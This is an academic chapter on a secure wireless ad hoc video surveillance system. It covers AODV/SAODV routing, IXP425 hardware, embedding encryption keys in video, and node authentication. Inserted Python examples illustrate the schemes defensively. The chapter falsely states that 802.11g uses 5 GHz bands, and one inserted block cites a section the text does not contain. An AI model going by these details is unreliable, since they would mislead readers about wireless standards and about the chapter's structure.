In recent years, a large number of ad hoc routing protocols have been proposed in the literature (Broch, Maltz, Johnson, Hu, & Jetcheva, 1998; Perkins & Royer, 1999; Per, 1999; Samir, Perkins, & Royer, 2000). In all these studies, two on-demand routing protocols show good performance: ad hoc distance vector (AODV) (Perkins & Royer, 1999) and DSR. In a scenario where a high volume of traffic goes through a static ad hoc network (by static we mean that the nodes’ configuration does not change or changes slowly), AODV performs better than DSR due to less additional load being imposed by source routes in data packets. Therefore our system is based on the AODV protocol.

AODV is an on-demand protocol. Each node maintains its routing table only for the routes it actually uses to communicate with other nodes. If a node wants to initiate a new communication with another node that is not in its current routing table, a route request (RREQ) is broadcast. If a node receives such a request, it looks up its routing table to find whether there is a path to the destination node. If there exists a path, it replies with a route reply (RREP); otherwise, it rebroadcasts the RREQ. If a node receives the same RREQ twice, it simply discards the message. Routes are maintained in the routing table as long as packets are sent over them. If nothing is received after a predefined timeout value, the corresponding route entry is deleted. In case of node failure, neighbors on the active path send a special RREP to the source, which can start a new path discovery phase. Neighbor discovery is done either by local broadcasting of HELLO messages or by receiving a broadcast message from a neighbor, given that the links between nodes are bidirectional.

Perkins and Royer (1999) try to avoid relying on the underlying MAC-layer protocol, but no solution has been proposed to avoid the overhead created by the HELLO messages. In our system the routing protocol is coupled with the address resolution protocol (ARP) as described by Desilva and Das (2000) so that we can avoid broadcasting HELLO messages. In addition, it is preferred to implement the routing protocol at the link layer for the following reasons (Johnson, Maltz, & Broch, 2001):

• Pragmatically, running the protocol at the link layer maximizes the number of mobile nodes that can participate in ad hoc networks.
• Historically, the protocol has grown from a multihop propagating version of the Internet’s address resolution protocol (Plummer, 1982), as well as from the routing mechanism used by IEEE 802 source routing bridges (Perlman, 1992).
• Technically, our design would expect the protocol to be simple enough that it could be implemented directly in the firmware inside wireless network interface cards, well below the layer 3 software within mobile nodes.


Network Processor

Intel IXP425 network processors are used as the basic processing unit to design our wireless video surveillance system. The Intel® IXP425 network processor is a highly integrated, versatile single-chip processor used in a variety of products that need network connectivity and high performance to run their unique software applications. The Intel IXP425 network processor combines integration with support for multiple WAN and LAN technologies in a common architecture designed to meet requirements for high-end gateways, voice over IP (VoIP) applications, wireless access points, small-to-medium enterprise (SME) routers, switches, security devices, Mini-DSLAMs (digital subscriber line access multiplexers), xDSL line cards, industrial control, and networked imaging applications. The framework of the Intel® IXP425 is shown in Figure 1 (Intel, 2006). The Intel IXP425 network processor provides diverse functionalities, including data encryption, secure data transmission, and multimedia processing, thus making it an ideal choice for implementing secure ad hoc video surveillance systems.

Though the Intel IXP425 network processor is an ideal choice for implementing secure ad hoc video surveillance systems, the security issue is still a hot-spot that the IXP425 cannot handle well on its own. For example, video encryption is very important in a wireless LAN environment since everyone can receive the video content and inject faked video packets. Unfortunately, normal data encryption functions like the AES provided by the IXP425 are too computationally expensive to be applied to every single outgoing packet, especially in a wireless ad hoc network environment which should consider the power limitation of wireless devices (Allman, 2002; Borisov et al., 2003). Therefore, an effective video encryption algorithm is necessary. At the same time, the secure routing protocol and system architecture should all be carefully designed to avoid serious security flaws.

Figure 1. Framework of Intel® IXP425


A NOVEL SECURE VIDEO SURVEILLANCE SYSTEM

Framework Design of Wireless Networks

The system is based on the 802.11g wireless ad hoc infrastructure. Intel IXP425 network processors are used as the basic processing unit. 802.11g is a physical layer standard for WLANs with 2.4 GHz and 5 GHz radio bands. It specifies three available radio channels. The maximum link rate is 54 Mbps per channel whereas 802.11b has 11 Mbps. The 802.11g standard uses OFDM modulation. However, for backward compatibility with 802.11b, 802.11g also supports complementary code-keying (CCK) modulation and, as an option for faster link rates, it allows packet binary convolutional coding (PBCC) modulation (Wentink, 2003).

Our wireless video system is composed of a set of camera nodes and a monitoring center, as shown in Figure 2. Each camera node is equipped with an IXP425 processor and an 802.11g wireless card. The video source is captured by the camera, and then compressed by the processor locally. After that, a watermark containing the authentication information and encryption key of the video data is embedded into the video signal. The watermark is designed to be robust and difficult for the attacker to remove. The video data are then encrypted using our earlier proposed video selective encryption scheme (Yin, Lin, Qiu, Li, Tan, & …, 2005), which is implemented to be compatible with the hardware encryption engine supported by the IXP425, so that the whole video processing can be performed in real-time.

The camera nodes are organized as a wireless ad hoc network in which every node also functions as a router to relay the video data from other nodes. Encrypted frames are finally routed to the monitoring center, traveling through a series of camera nodes. Usually the physical locations of all camera

Figure 2. Architecture of secure wireless video systems

nodes are fixed. It is possible that some nodes are out of range from the main network. In this case, some bidirectional signal repeaters or amplifiers could be placed in strategic points to provide robust coverage for every node (Yin et al., 2005).

Video Processing

For the sake of security concerns, encryption keys are updated periodically. Thus, a core part of the system is how to embed encryption keys in the video data stream. Unlike normal watermarking techniques, in our system the camera nodes should not only detect the existence of a new encryption key but also extract it without losing any information, as shown in Figure 3.

Our key embedding algorithm focuses on the reliability and accuracy of embedded keys against the influences introduced by transmission errors and adaptive mechanisms. Real-time processing is also a requirement when designing the algorithm. The key embedding process can be divided into two parts: key embedding and key detecting. The first part is conducted by the video encoder, while the second part is conducted by the video decoder. New keys are embedded in the I-frames (intra frames) of a group of pictures (GOP) and directly modulated into the direct current (DC) component of the DCT coefficients of luminance blocks. In our algorithm, 200 bits of data can be embedded in one I-frame of size 640x480. Moreover, the key takes only 128 bits among the data.

In order to improve the error resilience capability, we employ Reed-Solomon (RS) code as the error control scheme. RS code is used to encode the key messages and an 8-bit flag, and this takes the remaining 64 bits for RS code words. Then, all the GOPs are encrypted by the selective encryption algorithm, which contains some hash functions supported by IXP425 hardware, corresponding to the old key. Finally, the encrypted data are sent out to a neighbor node via the wireless network. After the data are received, the incoming packets are first decrypted and then decoded. When the embedded key messages are detected, the new key is used for future data decryption. If a GOP is badly damaged, the embedded key messages may not be extracted correctly. Therefore, we use more than one GOP to embed the rekey messages for redundant recovery (Yin et al., 2005). Figure 4 gives an example of three GOPs containing the redundant key messages.

Figure 3. Real-time key embedding and key detecting process. Ki is the 128-bit key information used to encrypt the video content.
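The QIM embedding and minimum-distance detection described under Security Issues, together with the rekey message layout and redundant-GOP recovery described above, as one added example that is not the chapter's code: a 200-bit rekey message (128-bit key, 8-bit flag, 64 check bits) is modulated into the DC coefficients of an I-frame's luminance blocks, the decoder detects each bit by minimum distance, and the first of three GOPs whose message passes the check supplies the new key. The quantizer step STEP, a truncated SHA-256 used as a detection-only stand-in for the chapter's Reed-Solomon parity, and the constructed DC coefficient values are assumptions made here.

```python
"""Rekey message embedding with QIM into I-frame DC coefficients, with redundant GOPs.

Added example modelled on the chapter's description; it is not the authors' code.
Assumptions made here: the quantizer step STEP, a truncated SHA-256 as a
detection-only stand-in for the chapter's Reed-Solomon parity bits, and the
constructed DC coefficient values used as sample input.
"""
import hashlib
import random
import secrets

KEY_BITS, FLAG_BITS, PARITY_BITS = 128, 8, 64      # 200 bits per I-frame, as in the chapter
MSG_BITS = KEY_BITS + FLAG_BITS + PARITY_BITS
STEP = 16.0                                         # QIM step (assumption); decision margin STEP/4

def qim_embed(value, bit):
    """Quantize with the quantizer selected by bit; the bit-1 lattice is shifted by STEP/2."""
    offset = 0.0 if bit == 0 else STEP / 2
    return round((value - offset) / STEP) * STEP + offset

def qim_detect(value):
    """Minimum-distance decision between the two quantizers' nearest reconstruction points."""
    d0 = abs(value - qim_embed(value, 0))
    d1 = abs(value - qim_embed(value, 1))
    return 0 if d0 <= d1 else 1

def bits_from_bytes(data):
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]

def bytes_from_bits(bits):
    out = bytearray()
    for i in range(0, len(bits), 8):
        byte = 0
        for b in bits[i:i + 8]:
            byte = (byte << 1) | b
        out.append(byte)
    return bytes(out)

def build_rekey_message(key, flag):
    """128-bit key + 8-bit flag + 64 check bits = 200 bits (the chapter's layout)."""
    if len(key) != 16 or not 0 <= flag < 256:
        raise ValueError("key must be 16 bytes and flag one byte")
    body = key + bytes([flag])
    check = hashlib.sha256(body).digest()[:PARITY_BITS // 8]   # stand-in for RS parity
    return bits_from_bytes(body + check)

def parse_rekey_message(bits):
    """Return (key, flag) when the 64 check bits match, else None (message damaged)."""
    data = bytes_from_bits(bits[:MSG_BITS])
    body, check = data[:17], data[17:]
    if hashlib.sha256(body).digest()[:PARITY_BITS // 8] != check:
        return None
    return body[:16], body[16]

def embed_in_iframe(dc_coeffs, bits):
    """Encoder side: modulate one message bit into the DC coefficient of each of the first 200 blocks."""
    if len(dc_coeffs) < len(bits):
        raise ValueError("not enough luminance blocks for the message")
    out = list(dc_coeffs)
    for i, b in enumerate(bits):
        out[i] = qim_embed(out[i], b)
    return out

def extract_from_iframe(dc_coeffs):
    """Decoder side: detect the embedded bit in each carrier coefficient."""
    return [qim_detect(v) for v in dc_coeffs[:MSG_BITS]]

def recover_key(gops):
    """The first GOP whose embedded message passes the check supplies the new key."""
    for dc_coeffs in gops:
        parsed = parse_rekey_message(extract_from_iframe(dc_coeffs))
        if parsed is not None:
            return parsed
    return None

def make_iframe_dc(rng, width=640, height=480):
    """Constructed sample: one DC coefficient per 8x8 luminance block (8-bit DCT range 0..2040)."""
    return [rng.uniform(0.0, 2040.0) for _ in range((width // 8) * (height // 8))]

def add_noise(dc_coeffs, rng, amplitude):
    """Model transcoding error or transmission damage as uniform noise on every coefficient."""
    return [v + rng.uniform(-amplitude, amplitude) for v in dc_coeffs]

def simulate(seed, damaged, key, flag):
    """Embed the same rekey message in three GOPs (as in Figure 4), damage some, then decode."""
    rng = random.Random(seed)
    msg = build_rekey_message(key, flag)
    gops = []
    for i in range(3):
        frame = embed_in_iframe(make_iframe_dc(rng), msg)
        # requantization noise below STEP/4 is absorbed; damage larger than STEP/4 flips bits
        amplitude = STEP if i in damaged else STEP / 8
        gops.append(add_noise(frame, rng, amplitude))
    return recover_key(gops)

if __name__ == "__main__":
    k, f = secrets.token_bytes(16), 0x01
    print("two GOPs damaged, key recovered:", simulate(1, {0, 1}, k, f) == (k, f))
    print("all GOPs damaged:", simulate(1, {0, 1, 2}, k, f))
```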


Figure 4. The redundant GOPs used in the key updating process. From GOPi+1 to GOPi+3 there are three GOPs that contain the redundant key messages.

System Security Management

To develop a secure wireless video surveillance system, it is necessary to develop an effective video encryption algorithm, and meanwhile the secure routing protocol and system architecture should all be carefully designed to avoid serious security flaws.

Confidentiality

Data confidentiality is usually assured by encryption. However, encryption introduces large computational overhead. In a stringent environment like real-time video transmission, encryption can become the system bottleneck, and it is common knowledge that full video stream encryption is not a good choice (Liu & Eskicioglu, 2003). Our video selective encryption algorithm takes advantage of the properties of monitored video to achieve secure, real-time encryption.

If the routing messages are not protected, eavesdroppers may discover the network topology by listening to the routing information and then attack the most active nodes in the network. Topology information disclosure is not a threat by itself, but it can make other attacks more efficient. However, encrypting routing information could greatly increase the overhead. The basic AODV protocol has built-in capabilities for extension headers. The secure ad hoc distance vector (SAODV) protocol is a proposal by Zapata (2005) for such extension headers. The extensions are used to send signatures and hash values that are later used for verification of the routing packets. SAODV is not meant to yield any confidentiality since this is usually not needed or desired in general ad hoc networks. The protocol does provide means to get authentication, integrity, and nonrepudiation of the routing control packets. The protocol extensions use asymmetric cryptography to achieve authentication by signing the data packets with the private key. This allows the destination node and all intermediate nodes to validate the request. Also, this allows the nodes to be certain that no one has altered the packets. However, some fields of the packets must change, and these are signed as if they were zeroed out. To allow for verification of the hop count field, a one-way hash chain is utilized. The initiator of the route request decides a max hop count, such as 10 or 15. It also generates a random value which is sent as the hash for the first hop count. The value is also hashed the max hop number of times, producing a so-called top hash. Each node can verify the hop count by checking that the incoming hash value, hashed (max hop count minus the current hop count) times, is equal to the top hash. Since the top hash value is not changed, and thus signed,


this provides the means to authenticate even the mutable hop count.

The SAODV extensions allow for two different ways for nodes to reply to a route request. The first way is to only allow the destination to reply. In this way the protocol works as described above. The destination node creates a route reply and signs it using its own secret key. The route reply is sent according to the usual AODV and each intermediate node can verify the reply and discard it if not valid. This approach does not consider the possibility of having intermediate nodes reply directly if they already have a valid route. To add the ability for route discovery optimization, a double signature scheme is devised. For each route request a second signature is added to the packet. This signature is stored in each intermediate node when they set up the reverse route. Later on, when a new route is needed because of node movement between the two peers, an intermediate node that still has a route can reply directly by also including the second signature and the original signature (Yin et al., 2005). In addition to this, the actual lifetime is also sent in the reply, which is signed by the intermediate node that sends the reply.

Authentication

The host-to-host authentication between the camera and the monitoring center is achieved by data encryption. But in ad hoc networks, we also have to consider the problem of neighbors' authentication, as nodes are "observing" the external world through the "eyes" of their neighbors. The neighbors must be authenticated before any other communication can be initiated. In a nonauthenticated environment, external nodes can insert themselves in the data path and then collect, disrupt, or corrupt the information using man-in-the-middle or black and grey hole attacks. To reduce the effect of computational power consumption attacks, the authentication scheme is performed at the link layer. Neighbors' authentication is assured by a certificate-based approach (Stallings, 1999) which provides practical solutions for data integrity, authentication, and nonrepudiation. The practical protocol is presented by Luo, Zerfos, Kong, Lu, and Zhang (2002).

Reactive Protection Scheme

The ad hoc environment is usually considered as physically insecure. For instance, cameras can easily be stolen or corrupted. A corrupted camera node can be used as a Byzantine enemy (Lamport, Shostak, & Pease, 1995) to attack the rest of the network. However, resources in the ad hoc network are limited due to the embedded nature of the nodes; especially computational power is the system bottleneck. In this situation, signing every packet between every node is not realistic for real-time multimedia streaming. Besides, if a malicious entity controls a node, it also controls the authentication keys, and systematic authentication is not useful against this type of attack.

In our system only routing protocol messages are systematically signed and time-stamped to avoid basic attacks such as erroneous routing packet flooding. To prevent more subtle attacks like grey hole or session hijacking, we use the existing knowledge about the data stream (e.g., continuity, stability, fixed length, etc.) to detect misbehavior in the trusted network. Nodes which have detected misbehaving peers break the routes coming from the suspected nodes so that further traffic is ignored until a new (authenticated) route request is broadcast. The level of intrusion detection capability depends on the computational power. The system would have a misbehaving threshold beyond which the system will cut itself off from the rest of the network. The level of the threshold and the way to isolate the node from the network are worth further investigation.

Key Distribution

The key distribution solution proposed by Luo et al. (2002) has been chosen to safely distribute and refresh encryption keys and periodically check the integrity of the camera nodes. This protocol is based on the threshold secret sharing revealed by Shamir (1979) and improves the share refreshing proposed by Herzberg, Jarecki, Krawczyk, and Yung (1995). The system is based on RSA public key signatures. Each node gets a simple certificate in the form <vi, pki, Tsign, Texpire> where vi is the identification



number of the node, pki is the public key, Tsign is the time that the certificate is created, and Texpire is the certificate expiration time.
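The hop-count hash chain and the zeroed-field signature described in the Confidentiality subsection above, as an added example in Python; this is not code from the chapter or from the SAODV draft. The originator's RSA signature over the immutable fields is stood in for by a keyed SHA-256 digest so that the example runs with the standard library alone; the packet layout, the names create_rreq, forward, verify and altered, and the sample node names are this example's own assumptions, not SAODV's wire format.

```python
"""Hop-count protection with a one-way hash chain, SAODV style.

Added example. Assumptions: SHA-256 is the one-way function of the chain;
the originator's private-key signature is replaced by a keyed digest
(`sign`); the RouteRequest layout is invented for illustration.
"""
import dataclasses
import hashlib
import os


def h(data: bytes) -> bytes:
    """One-way function used for the chain (SHA-256, assumed)."""
    return hashlib.sha256(data).digest()


def hash_n_times(value: bytes, n: int) -> bytes:
    for _ in range(n):
        value = h(value)
    return value


def sign(msg: bytes) -> bytes:
    # Stand-in for the originator's RSA signature (assumption, see docstring).
    return h(b"ORIGINATOR-SIGNING-KEY|" + msg)


@dataclasses.dataclass(frozen=True)
class RouteRequest:
    originator: str
    destination: str
    rreq_id: int
    max_hop_count: int   # chosen by the originator, e.g. 10 or 15
    top_hash: bytes      # random seed hashed max_hop_count times
    hop_count: int       # mutable: every forwarder adds one
    hash_value: bytes    # mutable: every forwarder hashes it once
    signature: bytes     # covers the packet with the mutable fields zeroed

    def signable_bytes(self) -> bytes:
        """Serialize with hop_count and hash_value zeroed, as SAODV signs them."""
        fields = [self.originator, self.destination, str(self.rreq_id),
                  str(self.max_hop_count), self.top_hash.hex(), "0", "00" * 32]
        return "|".join(fields).encode()


def create_rreq(originator: str, destination: str, rreq_id: int,
                max_hop_count: int) -> RouteRequest:
    """Originator: random seed is the hash for hop 0, top hash = H^max(seed)."""
    seed = os.urandom(32)
    top_hash = hash_n_times(seed, max_hop_count)
    unsigned = RouteRequest(originator, destination, rreq_id, max_hop_count,
                            top_hash, 0, seed, b"")
    return dataclasses.replace(unsigned, signature=sign(unsigned.signable_bytes()))


def forward(rreq: RouteRequest) -> RouteRequest:
    """What an honest intermediate node does: hop_count + 1 and hash once."""
    return dataclasses.replace(rreq, hop_count=rreq.hop_count + 1,
                               hash_value=h(rreq.hash_value))


def verify(rreq: RouteRequest) -> bool:
    """Accept only if the immutable part is signed and the chain matches hop_count."""
    if rreq.signature != sign(rreq.signable_bytes()):
        return False                                  # an immutable field was altered
    if not 0 <= rreq.hop_count <= rreq.max_hop_count:
        return False                                  # hop count out of range
    remaining = rreq.max_hop_count - rreq.hop_count
    return hash_n_times(rreq.hash_value, remaining) == rreq.top_hash


def altered(rreq: RouteRequest, **changes) -> RouteRequest:
    """Copy of a request with some fields changed, to show what verify rejects."""
    return dataclasses.replace(rreq, **changes)


if __name__ == "__main__":
    rreq = create_rreq("cam-7", "monitoring-center", 1, max_hop_count=10)
    two_hops = forward(forward(rreq))
    print("honest two-hop request:", verify(two_hops))
    print("hop count lowered to 1:", verify(altered(two_hops, hop_count=1)))
    print("destination rewritten:", verify(altered(two_hops, destination="elsewhere")))
```

The check a receiving node performs is the last line of verify: the hash it received, hashed (max hop count minus hop count) more times, must reproduce the signed top hash. Lowering the hop count would require un-hashing, which is what makes the field tamper-evident; the chain cannot, however, force a forwarder to increment at all, a known limitation of hash-chain hop counts that the signature does not close.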
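The misbehavior detection sketched in the Reactive Protection Scheme subsection above (continuity, stability and fixed length of the stream, with a misbehaving threshold beyond which the route from the suspected node is broken until a new authenticated route request arrives), as an added example in Python; it is not the chapter's code. The packet fields, the threshold of three anomalies, the 1316-byte packet length, the 50 ms inter-arrival interval and both packet traces are constructed assumptions of this example.

```python
"""Stream-regularity misbehaviour monitor for a video relay path.

Added example. Assumptions: each received packet carries the neighbour
(previous hop) that delivered it, a sequence number, its length and an
arrival time; the stream is expected to have contiguous sequence numbers,
a fixed packet length and a stable inter-arrival time. Traces are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Packet:
    neighbour: str   # node that delivered the packet to us
    seq: int
    length: int
    t_ms: int


@dataclass
class NeighbourState:
    expected_seq: Optional[int] = None
    last_t_ms: Optional[int] = None
    anomalies: int = 0
    route_broken: bool = False


class StreamMonitor:
    def __init__(self, packet_len: int, interval_ms: int,
                 tolerance_ms: int, threshold: int):
        self.packet_len = packet_len
        self.interval_ms = interval_ms
        self.tolerance_ms = tolerance_ms
        self.threshold = threshold
        self.state: Dict[str, NeighbourState] = {}

    def observe(self, pkt: Packet) -> List[str]:
        """Check one packet against the known stream properties.

        Returns the anomalies found (empty for a normal packet). Once a
        neighbour's anomaly count reaches the threshold its route is broken
        and everything it delivers is ignored until reauthenticate().
        """
        st = self.state.setdefault(pkt.neighbour, NeighbourState())
        if st.route_broken:
            return [f"{pkt.neighbour}: ignored, route broken"]
        found = []
        if st.expected_seq is not None and pkt.seq != st.expected_seq:
            found.append(f"{pkt.neighbour}: continuity, expected seq "
                         f"{st.expected_seq} got {pkt.seq}")
        if pkt.length != self.packet_len:
            found.append(f"{pkt.neighbour}: length {pkt.length} != {self.packet_len}")
        if st.last_t_ms is not None:
            gap = pkt.t_ms - st.last_t_ms
            if abs(gap - self.interval_ms) > self.tolerance_ms:
                found.append(f"{pkt.neighbour}: stability, inter-arrival {gap} ms")
        st.expected_seq = pkt.seq + 1
        st.last_t_ms = pkt.t_ms
        st.anomalies += len(found)
        if st.anomalies >= self.threshold:
            st.route_broken = True
            found.append(f"{pkt.neighbour}: threshold reached, route broken")
        return found

    def reauthenticate(self, neighbour: str) -> None:
        """A new authenticated route request from the node restarts monitoring."""
        self.state[neighbour] = NeighbourState()

    def is_broken(self, neighbour: str) -> bool:
        return self.state.get(neighbour, NeighbourState()).route_broken


# Constructed traces: a well-behaved relay, and one whose stream loses a packet,
# arrives late and is truncated (the pattern the text associates with grey holes).
GOOD_TRACE = [Packet("relay-A", s, 1316, 50 * (s - 1)) for s in range(1, 6)]
BAD_TRACE = [Packet("relay-B", 1, 1316, 0), Packet("relay-B", 2, 1316, 50),
             Packet("relay-B", 4, 1316, 150),   # seq 3 never arrived, 100 ms gap
             Packet("relay-B", 5, 900, 200),    # truncated payload
             Packet("relay-B", 6, 1316, 250)]   # route already broken: ignored


def run_demo() -> Dict[str, int]:
    """Feed both traces through one monitor; return anomalies counted per neighbour."""
    mon = StreamMonitor(packet_len=1316, interval_ms=50, tolerance_ms=10, threshold=3)
    for pkt in GOOD_TRACE + BAD_TRACE:
        for msg in mon.observe(pkt):
            print(msg)
    return {name: st.anomalies for name, st in mon.state.items()}


if __name__ == "__main__":
    print(run_demo())
```

Only the data-plane properties are inspected here, which is what keeps the check cheap enough for an embedded node; the threshold trades detection delay against false isolation of a neighbour that merely suffers wireless loss, and the text leaves its value open.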
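The threshold secret sharing (Shamir, 1979) and the share refreshing (Herzberg et al., 1995) on which the Key Distribution subsection above rests, as an added example in Python; it is not the chapter's code nor the protocol of Luo et al. (2002). Assumptions: arithmetic in the prime field modulo 2^127 - 1, a random 126-bit session key as the shared secret, a (3, 5) threshold, and a single random zero-constant polynomial standing for the sum that the shareholders would jointly contribute in a full proactive refresh.

```python
"""Shamir (t, n) secret sharing with proactive share refreshing.

Added example. Assumptions: prime field GF(P) with P = 2**127 - 1; the
secret is an integer below P (here a session key); share i is (i, f(i)).
Refreshing adds shares of a random polynomial g with g(0) = 0, so the
secret is unchanged while every old share becomes useless on its own.
"""
import secrets
from typing import Dict, List, Tuple

P = 2**127 - 1            # field modulus (assumption)
Share = Tuple[int, int]   # (x, f(x))


def _eval_poly(coeffs: List[int], x: int) -> int:
    """Horner evaluation of sum(coeffs[k] * x**k) mod P; coeffs[0] is f(0)."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc


def split_secret(secret: int, threshold: int, n_shares: int) -> List[Share]:
    """Random polynomial of degree threshold-1 with f(0) = secret, evaluated at 1..n."""
    if not 0 <= secret < P:
        raise ValueError("secret must be a field element")
    if not 1 <= threshold <= n_shares < P:
        raise ValueError("need 1 <= threshold <= n_shares")
    coeffs = [secret] + [secrets.randbelow(P) for _ in range(threshold - 1)]
    return [(x, _eval_poly(coeffs, x)) for x in range(1, n_shares + 1)]


def reconstruct(shares: List[Share]) -> int:
    """Lagrange interpolation at x = 0; needs at least `threshold` distinct shares.

    With fewer shares the result is a field element unrelated to the secret.
    """
    xs = [x for x, _ in shares]
    if len(set(xs)) != len(xs):
        raise ValueError("duplicate share index")
    secret = 0
    for xi, yi in shares:
        num = den = 1
        for xj in xs:
            if xj != xi:
                num = num * (-xj) % P
                den = den * (xi - xj) % P
        secret = (secret + yi * num * pow(den, -1, P)) % P
    return secret


def refresh(shares: List[Share], threshold: int) -> List[Share]:
    """Proactive refresh in the style of Herzberg et al.: add g(x) with g(0) = 0.

    Simplification (assumption): one random g instead of the sum of one g per
    shareholder; the effect on the shares is the same.
    """
    g = [0] + [secrets.randbelow(P) for _ in range(threshold - 1)]
    return [(x, (y + _eval_poly(g, x)) % P) for x, y in shares]


def demo() -> Dict[str, bool]:
    key = secrets.randbits(126)                        # constructed session key
    shares = split_secret(key, threshold=3, n_shares=5)
    new_shares = refresh(shares, threshold=3)
    return {
        "three_old_shares_recover_key": reconstruct(shares[:3]) == key,
        "two_shares_do_not": reconstruct(shares[:2]) != key,
        "three_new_shares_recover_key": reconstruct(new_shares[1:4]) == key,
        "old_and_new_shares_do_not_mix": reconstruct([shares[0]] + new_shares[1:3]) != key,
    }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

The last two checks are the point of refreshing: after a refresh the network still reconstructs the same key from any three current shares, while a share captured from a stolen camera before the refresh no longer combines with current ones, which is what lets the scheme tolerate the gradual compromise of nodes that the text assumes.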
System Performance Evaluation

This section tests the performance of the system we designed and meanwhile introduces one approach to evaluate such a system, which may be applied to general wireless video surveillance systems.

Testing Environment

The testing procedure involves three steps. First we evaluate the video encoding and encryption algorithms, along with the basic network stack evaluation on a single link. In the second step, we measure the performance of a node for transmitting traffic to other nodes. The third step is a simulation study of a large scale network in order to analyze how the system evolves when the number of cameras increases.

• Single node capability: The testbed is composed of an IXP425 network processor and its evaluation board. The network interface of the camera node is a wireless 802.11g compatible network interface. A desktop computer equipped with the same network interface is used to stand for the monitoring center and to test the video decryption and playback.
• Routing capability: A set of low cost computers is equipped with wireless network interfaces and generates traffic towards the tested node. Different physical dispositions are set to test one-hop and multihop routing performance.
• Scalability: Large scale experiments are very challenging because they require too much hardware. We plan to use the results obtained from Steps 1 and 2 to build a realistic model of the node and simulate a large scale system.
• Nodal processor: The Intel IXP425 network processor is chosen as the nodal processor of our system. Intel IXP425 is a member of Intel's IXP4XX product line of network processors, for small-to-medium enterprise, consumer, and other edge network applications. Like Intel's high-end network processors of the IXP2k series, IXP425 is also a multicore system that employs system-on-chip (SoC) techniques to support multiple WAN and LAN technologies in a highly integrated and versatile architecture. The Intel XScale core at up to 533 MHz provides headroom for customer-defined applications. It also supports a single-instruction stream multiple-data stream (SIMD) coprocessor for multimedia application acceleration. In our system, the video encoder and watermark embedding are performed on XScale with optimization towards the SIMD coprocessor. Three network processor engines (NPEs), like the micro-engines of IXP1k and 2k network processors, are designed to complement the Intel XScale core for many computationally intensive data plane operations. These tasks include IP header inspection and modification, packet filtering, packet error checking, checksum computation, and flag insertion and removal. The NPE architecture includes an ALU, self-contained internal data memory, an extensive list of I/O interfaces, together with hardware acceleration elements. The hardware acceleration elements associated with an NPE target a set of networking applications. Each hardware acceleration element is designed to increase the speed of a specific networking task that would otherwise take many MIPS to complete by a standalone RISC processor. Among these functions, the cryptographic hardware accelerators (SHA-1, MD5, DES, 3DES, AES) in NPEB are used in our application for selective video encryption.

Experiments on Key Embedding Algorithm

This subsection focuses on the performance evaluation of the key embedding algorithm in a wireless


environment. The algorithm is implemented on the platform of the Intel IXP425 network processor. We use two MPEG-2 test sequences, dinosaur and live-captured video, which are both encoded at 640x480 size and 20 fps using 500 frames. The sequences are selected because of their different characteristics in motion and scene change. Dinosaur contains fast motion and scene change, while live-captured video contains slow motion and a fixed scene. Besides, we should face the challenge derived from packet loss and bit error. We test the system in a real wireless network environment. The last module is a key detecting and decoding module, which contains the selective encryption algorithm, the MPEG-4 decoder, and the key embedding algorithm. They are used to decrypt the bitstream using the old session key, and then detect the embedded key messages and decode the compressed video into playback video.

Based on this platform, we conduct a series of experiments to evaluate the system performance (Yin et al., 2005). The source-coding distortion introduced by our key embedding algorithm is illustrated in Figure 5. The video clip is MPEG-2 encoded with different modulation cycles. It is then transcoded and decoded by the MPEG-4 decoder. All the four pictures are selected from the playback video. Obviously, the modulation cycle is the most important factor that affects the quality of the video sequence. When the modulation cycle is no larger than 4, the distortion derived from key embedding can be neglected. Figure 6 illustrates the PSNR of the dinosaur sequence at the receiver side. It is worth noting that the larger modulation cycle can not only degrade the PSNR but also introduce PSNR fluctuation, while a modulation cycle less than 4 can provide a good quality of video.

Figure 7 illustrates the number of error bits found in the detection of all the 200 bits in a frame against the modulation cycle C. The downscaling in the transcoder reduces the width and height of the original video by half. This procedure reduces the blocks in each field, but does not have too much impact on the detection quality. However, it can be seen that the requantization greatly impacts the detection quality when the modulation cycle is less than 3. As shown in Figure 7, when the quantizer in the requantization (denoted by "new quantizer" in the figure) is higher and the quantizer in the source encoding (denoted by "old quantizer" in this figure) is closer to half of "new quantizer," more error bits appear in the detection procedure. When the modulation cycle is more than 4, errors have almost disappeared.

Figure 5. The effect of security management on video

Original | One-frame encrypted | All frames encrypted


Figure 6. PSNR of frames and the probability of successfully detecting 200 bits in a frame, changed with the modulation cycle at the receiver

Figure 7. Average error bits in total 200 bits embedded in an I-frame after transcoding with different modulation cycles and quantizers

Figure 8. Average error bits in total 200 bits of a GOP by using different packet loss rates; (a) RS code is not used, while (b) RS(25,17) code is used

(a) (b)

Figure 8 reveals the average error bits when receiving 200 bits of data vs. the packet loss rate in the network. It can be seen that the extracted data error rate in a GOP rises as the packet loss rate increases. Usually the bitstream of an I-frame is divided into more than 10 packets for transmission in the network. As a result, key information is distributed into all the packets, and the loss of packets leads to some error bits in the extracted key message.

As for the coding speed, Table 1 shows the coding time of the key embedded coding scheme against the pure MPEG-2 encoder without data embedding. We can find that after the introduction of the key embedding algorithm, the processing time is only increased by around 6%.


Simulation of Routing Protocols

Preliminary simulations on AODV have been conducted in order to validate the choice of the routing protocol. The objective here is to have a qualitative evaluation of the routing protocol. Simulations have been conducted using the NS2 simulator.

The arrows in Figure 9(a) represent the stream paths, and we can see that the nodes are choosing the shortest paths to reach the monitoring center in order to reduce the number of hops per path in comparison with an architectural network.

Figure 9(b) reveals the volume of traffic received by each node in the scenario where a few cameras are placed at different floors in a building and the distances between the nodes are greatly exaggerated (we do not consider the effect of reverberation against obstacles here). The figure shows that the monitoring center is the bottleneck of the architecture. This is inevitable in a monitoring system where all the streams are converging in one point. However, this phenomenon implies that the overall capacity is limited by the performance of the monitoring center.

Figure 9(a). Topology of a small monitoring system

Figure 9(b). Bandwidth of nodes in an ad hoc network under converging multimedia traffic

Table 1. Complexity of the key embedding algorithm

Sequence                                        Dinosaur    Live-captured
Encoding speed without embedding (frame/sec)    35.45       37.27
Encoding speed with embedding (frame/sec)       33.50       35.00
Increased processing time (%)                   5.8%        6.5%

Future Trends

With the continuing need for video surveillance in both fixed and remote locations, new advances in wireless networking would enable the development of a more secure, highly reliable wireless video network capable of supporting real-time, high speed, high resolution video, and meanwhile maintaining the highest levels of data and network security without impacting the video stream. Technical trends and key issues in the wireless video system may include:

